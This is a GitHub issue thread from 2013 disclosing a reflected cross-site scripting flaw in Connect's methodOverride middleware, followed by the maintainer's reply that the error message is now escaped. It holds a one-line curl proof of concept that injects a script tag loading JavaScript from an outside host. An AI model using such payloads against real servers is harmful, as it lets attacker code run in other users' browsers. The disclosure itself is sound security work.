Security Issue - Cross-Site Scripting with connect.methodOverride() #831

Closed
m13 opened this Issue Jun 27, 2013 · 1 comment

2 participants

@m13

This middleware overwrite req.method with the req.body['_method'] value. When you don't catch the error it responds with a default error msg: "Cannot [METHOD] [URL]" (https://github.com/senchalabs/connect/blob/6db901f967036ccc3c892b4bcb5bcb59e0b0dca9/lib/proto.js#L155). Because this is not enough sanitized, you can force a Cross-Site Scripting in the response:

~ curl "localhost:3000" -d "_method=<script src=http://martes13.net/a.js></script>"
Cannot <SCRIPT SRC=HTTP://MARTES13.NET/A.JS></SCRIPT> /

This is very dangerous because in a server like ExpressJS it won't be handled with a app.all('/*', ...), so all servers using this middleware are vulnerable.

To fix this hole, I don't know if it is better to fix the proto.js#L155 or the middleware.

@tj
Sencha Labs member
tj commented Jun 27, 2013

I patched with an escape for now but I'll whitelist the methods as well, it's not a huge vulnerability since you can't easily pass around a POST but doesn't hurt to escape, thanks for the report

@tj tj closed this Jun 27, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment